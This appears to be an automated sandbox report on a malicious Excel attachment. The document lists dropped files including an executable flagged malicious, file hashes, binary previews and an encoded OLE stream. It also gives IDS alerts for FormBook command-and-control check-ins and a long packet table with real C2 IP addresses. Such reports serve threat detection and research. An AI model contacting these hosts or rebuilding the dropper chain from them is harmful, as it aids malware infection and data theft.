                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........&/..H|..H|..H|..K}..H|..M}Q.H|..L}..H|S.K}..H|S.M}..H|S.L}..H|..I}..H|..I|z.H|I.M}..H|I.J}..H|Rich..H|........................PE..L.....Re.....................J....................@..........................P......................................................................................0...T..............................@............................................text............................... ..`.rdata..R...........................@..@.data....9.......*..................@....gfids.......0......................@..@.tls.........@......................@...........................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\wekfrorm.cno

                                Download File
                                Process:C:\Users\user\AppData\Roaming\word.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):209934
                                Entropy (8bit):7.992128423585276
                                Encrypted:true
                                SSDEEP:3072:Nm2BowKOqiLmXLw/q0Thw1uYcHFj1UrjjXOmb36STLNQUytr1UWouwDY3PZn8TGo:HJ69oHTUrjdtqEuwU3Bn8Hp
                                MD5:2D23E7AB5BFB49D8D5C66C4551E9763E
                                SHA1:9ED89848DE588F204C4AA29878D0AA26C7161239
                                SHA-256:671AD33D741EB3A83C2A7CC13C40E9E1FDB2C3CF3DB9D3EA512991700F06D329
                                SHA-512:5B2AEC2DB904FDDD124C53D91263F664DE2CD038DB592741AB1FEA91AD0BB80847931D95D04AC907C2B6C11D876E42819A1C1B629A4D3B37D9E115D8B50C860A
                                Malicious:false
                                Reputation:low
                                Preview:NI.(..a..ta}.b....t..Oame&.=[..H)......+....?..m.....Y.RW..G../..I$zS.......?......O...oN.g.....z..<jY.....1.7.p"ni|.W.._.../).......D.p..*.|}&...)l}A*._A...&4n$#...6.C4@g..|}.s.E....y..b..8..5.....K..NN........'.q.).....d.....>.[..J....a@.y....|.a...c.~...F8...U<.%c.j...$). ....+..v.?..m....>Y.RW..G../.....S.w...@?.5l....J.......%..4g.G.l...s.AiM"4[.;|.P$.k.W.._..................*@C....[)..^..R....u..4k..c.Nh#C4@g..|#\...... [d..Z...Y.....K..5N..X.s.-$...q.)........n.>.@.J@....a..y..}.|.a.....~...F....|<.%c.jl..H)......+....?..m.....Y.RW..G../.....S.w...@?.5l....J.......%..4g.G.l...s.AiM"4[.;|.P$.k.W.._..................*@C....[)..^..R....u..4k..c.Nh#C4@g..|}.s.E.......SZ...eY.....K..5N..X.s..$.'.q.)........n.>.@.J@....a..y..}.|.a.....~...F....|<.%c.jl..H)......+....?..m.....Y.RW..G../.....S.w...@?.5l....J.......%..4g.G.l...s.AiM"4[.;|.P$.k.W.._..................*@C....[)..^..R....u..4k..c.Nh#C4@g..|}.s.E.......SZ...eY.....K..5N..X.s..$.'.q.)....

                                C:\Users\user\AppData\Local\Temp\~DFB4BAED8D676EAAFE.TMP

                                Download File
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):1478656
                                Entropy (8bit):7.232314461325792
                                Encrypted:false
                                SSDEEP:24576:DQI/UZhXtvkMeLaA4mzgY0ezXvKJGLR/GnhYzW:jsZh9TeOnXJ/h
                                MD5:F772FD06411290F17EEFFF387B404E79
                                SHA1:EE88B130974D67810BB8C7BA8FB77993A22A48B0
                                SHA-256:FD4F3EB1AB0E9CE2580B082ECCCD3DB3EBFD51514F0127979C66E6DCAAADF7CA
                                SHA-512:8A4616941A8F58FEC7D4C09A88C8AA541C0EAEDD9FCCFE3F82156A21FFEB62908E025FEA9F269B02B056ADFB6C8A456467607FE05720C2E8FC6163DECDDB0DE7
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Roaming\word.exe

                                Download File
                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Category:dropped
                                Size (bytes):400516
                                Entropy (8bit):7.871791543277087
                                Encrypted:false
                                SSDEEP:6144:BBlL/NXMMK36zVS2WGWZu3B8W8ee5ssX8dsuM7AjWe/7mr027RSPII41hnDHjD+p:HfrKqz02XSHscDcP/7mAgSPI5DDD+p
                                MD5:AFFC03992E31B5D4324B41CBD40D911E
                                SHA1:8C3138D444CA823DA937022FE29CB421B243A076
                                SHA-256:6F0AED190A415542A227D4DED6FF390ED8FBC0759B75E5BAEC91BD6C9C3FA752
                                SHA-512:CD5B37C2C0A2CF8594C904084B2C3BDFFC9729B01B79B2135F903F21F502E9C41E8003DCD91DA6D87987DA62EEACC6FB075AE2EC3C901ECF9BE2FDFDF482CA1A
                                Malicious:true
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@..........................................................................t.......................................................................................p..|............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data...8............r..............@....ndata.......P...........................rsrc................x..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\Desktop\~$RFQ-T56797W_1.xlsx

                                Download File
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):165
                                Entropy (8bit):1.4377382811115937
                                Encrypted:false
                                SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                MD5:797869BB881CFBCDAC2064F92B26E46F
                                SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                Malicious:false
                                Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                Static File Info

                                General

                                File type:Microsoft Excel 2007+
                                Entropy (8bit):7.998661776240753
                                TrID:
                                • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                • ZIP compressed archive (8000/1) 16.67%
                                File name:RFQ-T56797W_1.xlsx
                                File size:1'228'030 bytes
                                MD5:138d7d8a55bef05ac6368488b3c9630d
                                SHA1:f9e93ed382d3005a7575443369207f2c3339309b
                                SHA256:25e7a5ff8ca830bccda9a6617b31fb3992d4f780444cf3adc8cfb8056f26dd58
                                SHA512:5ad15b60f1e97b83ccd32b4bb06716552e429d4bec0cee78efa99a545ee05d4abbc6f7c896f7ce079431d90e6758aa4cb68a98672511e9f360a8509d1bf621f6
                                SSDEEP:12288:YWdBCwo3NVvUP/hkRQFTvW7HKReRSR0H8CK/+d5NUzsChpgUWxt7HCZoUPYG0hmL:YgtI/u/httvKaey0cgzobrhPEm+RlDS
                                TLSH:0D4533A1D3AD958F6BA4C06426E45AC6212FFD9C95A339BD12B0E8C758093C7DF3F160
                                File Content Preview:PK........@*mW...g....g.......[Content_Types].xmlUT.....Qe..Qe..Qe.UKK.1.....%W..U...">..TP.k.L..l.3cm....U..XZ...%...M...Y..)$..W.WvE.^.c.....W.#Q )o...*1...'.;..y.,....c.x,%.1.......0.Z.....JO...~.{(u...:.9.I...$k..S.nT.:r.$1.,....Dq..f.J........z.C...C

                                File Icon

                                Icon Hash:2562ab89a7b7bfbf

                                Static OLE Info

                                General

                                Document Type:OpenXML
                                Number of OLE Files:1

                                OLE File "RFQ-T56797W_1.xlsx"

                                Indicators
                                Has Summary Info:
                                Application Name:
                                Encrypted Document:False
                                Contains Word Document Stream:False
                                Contains Workbook/Book Stream:True
                                Contains PowerPoint Document Stream:False
                                Contains Visio Document Stream:False
                                Contains ObjectPool Stream:False
                                Flash Objects Count:0
                                Contains VBA Macros:False
                                Summary
                                Author:ctrl
                                Last Saved By:ctrl
                                Create Time:2022-11-18T02:05:27Z
                                Last Saved Time:2022-11-18T02:07:12Z
                                Creating Application:Microsoft Excel
                                Security:0
                                Document Summary
                                Thumbnail Scaling Desired:false
                                Contains Dirty Links:false
                                Shared Document:false
                                Changed Hyperlinks:false
                                Application Version:12.0000

                                Streams

                                Stream Path: \x1oLE10NAtIvE, File Type: data, Stream Size: 1462179
                                General
                                Stream Path:\x1oLE10NAtIvE
                                CLSID:
                                File Type:data
                                Stream Size:1462179
                                Entropy:7.225828857618607
                                Base64 Encoded:True
                                Data ASCII:< . . . . a ' j & . . 6 . O . ( R . ? - U . . . p S D . . . j ) . Y i i X f { > . b $ . V m O . . . I P z C X 7 . > } o w . z . p . * . t . * . e Z . . P . t z . . L I . r . . A h { ] J B # @ ^ 2 . @ : l } " E c { . . . l . Q . . G h . K y W < 0 W . k ` c 6 . Q - W 4 A . . . H . A 9 d . . . . E r . . Y O r . 8 O n 9 I . < d . . } , h . i [ . = . . $ a ) # o = 3 ) . x ? 5 + ~ % y ` { i | z . . O & z & . T c . 0 @ . } . " & f E G . . . $ . < . . . . . ' 7 w . 8 . . V & _ . Z : 9 ! u } 0 J E k t _ . % "
                                Data Raw:88 cb 3c 04 02 fc f7 98 f4 fd 01 08 61 27 be 6a f9 26 fb 81 c6 d2 c3 1e 05 8b 36 8b 16 b8 4f 98 b9 ff f7 d0 8b 28 52 ff d5 05 3f ce f4 f7 2d 55 1c ed f7 ff e0 03 c6 af 70 fb 9b 53 44 00 13 ce 0c 6a 8c 29 85 d9 ba e5 b4 df 59 69 69 c3 58 66 7b e1 3e f6 df 9f 62 24 18 56 f0 6d a9 d7 eb e2 4f 10 1d d0 1a 96 99 f5 49 b4 f7 50 dc 7a 43 8a 58 37 9e 02 20 3e 7d 6f 77 d2 ab c0 7a 1e 70 82
                                Stream Path: WfMtcrVR, File Type: empty, Stream Size: 0
                                General
                                Stream Path:WfMtcrVR
                                CLSID:
                                File Type:empty
                                Stream Size:0
                                Entropy:0.0
                                Base64 Encoded:False
                                Data ASCII:
                                Data Raw:

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                192.168.2.2238.11.36.6849167802031412 11/14/23-13:28:23.777818TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2238.11.36.68
                                192.168.2.2291.195.240.1949166802031412 11/14/23-13:28:02.320328TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.2291.195.240.19
                                192.168.2.22103.224.212.21249164802031412 11/14/23-13:27:01.556896TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916480192.168.2.22103.224.212.212
                                192.168.2.223.33.130.19049168802031412 11/14/23-13:28:45.165462TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.223.33.130.190
                                192.168.2.2234.149.87.4549169802031412 11/14/23-13:29:05.883659TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.2234.149.87.45
                                192.168.2.2241.185.64.15549162802021697 11/14/23-13:26:24.263209TCP2021697ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious4916280192.168.2.2241.185.64.155

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 14, 2023 13:26:23.836503029 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:24.262617111 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:24.262689114 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:24.263209105 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:24.689160109 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:24.701302052 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:24.701364994 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:24.701396942 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:24.701405048 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:24.701423883 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:24.701446056 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:24.701448917 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:24.701483011 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:24.701486111 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:24.701525927 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:24.701528072 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:24.701565027 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:24.701565027 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:24.701605082 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:24.701606035 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:24.701642990 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:24.701647043 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:24.701679945 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:24.701680899 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:24.701724052 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:24.712649107 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.127831936 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.127876997 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.127916098 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.127955914 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.127994061 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.127996922 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.127996922 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.127996922 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.128037930 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.128076077 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.128086090 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.128086090 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.128115892 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.128118038 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.128154993 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.128185987 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.128196955 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.128225088 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.128237009 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.128245115 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.128278971 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.128284931 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.128317118 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.128340960 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.128357887 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.128362894 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.128396034 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.128403902 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.128437042 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.128444910 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.128479004 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.128520012 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.128556013 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.128585100 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.128595114 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.128598928 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.128634930 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.128700972 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.128740072 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.130167961 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.130733967 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.554306030 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.554337025 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.554351091 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.554358959 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.554373026 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.554389000 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.554413080 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.554426908 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.554444075 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.554456949 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.554521084 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.554557085 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.554651976 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.554666996 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.554706097 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.554716110 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.554722071 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.554732084 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.554744959 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.554754972 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.554769039 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.554786921 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.554917097 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.554932117 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.554944992 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.554960012 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.554965973 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.554979086 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.554997921 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.555066109 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.555107117 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.555139065 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.555155039 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.555166960 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.555180073 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.555181026 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.555193901 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.555197954 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.555212021 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.555216074 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.555226088 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.555234909 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.555248976 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.555263996 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.555372000 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.555416107 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.555448055 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.555461884 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.555474043 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.555480957 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.555489063 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.555510998 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.555571079 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.555583954 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.555597067 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.555610895 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.555620909 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.555622101 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.555639982 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.555645943 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.555663109 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.555679083 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.555783987 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.555798054 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.555831909 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.555843115 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.557790995 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.558686018 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.980669975 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.980690002 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.980701923 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.980716944 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.980853081 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.980943918 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.980958939 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.980969906 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.980984926 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.981015921 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.981029034 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.981107950 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.981122971 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.981139898 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.981156111 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.981164932 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.981178045 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.981199026 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.981311083 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.981328964 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.981342077 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.981355906 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.981372118 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.981395960 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.981477022 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.981491089 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.981524944 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.983479977 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.983727932 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.983741045 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.983752966 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.983797073 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.983812094 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.984205008 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.984796047 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.984812021 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.984826088 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.984839916 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.984839916 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.984858990 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.984859943 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.984877110 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.984882116 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.984898090 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.984941006 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.984991074 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.985004902 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.985033989 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.985049963 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.985058069 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.985073090 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.985100985 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.985115051 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.985331059 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.985343933 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.985357046 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.985369921 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.985373974 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.985384941 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.985390902 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.985409021 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.985411882 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.985424995 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.985428095 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.985439062 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.985456944 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.985464096 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.985476017 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.985512018 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.985527039 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.985538960 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.985552073 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.985555887 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.985570908 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.985585928 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.985652924 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.985668898 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.985682011 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.985694885 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.985697031 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.985707998 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.985727072 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.985735893 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.985779047 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.985793114 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.985800982 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:25.985857964 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.986527920 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:25.986994982 CET4916280192.168.2.2241.185.64.155
                                Nov 14, 2023 13:26:26.407355070 CET804916241.185.64.155192.168.2.22
                                Nov 14, 2023 13:26:26.407378912 CET804916241.185.64.155192.168.2.22
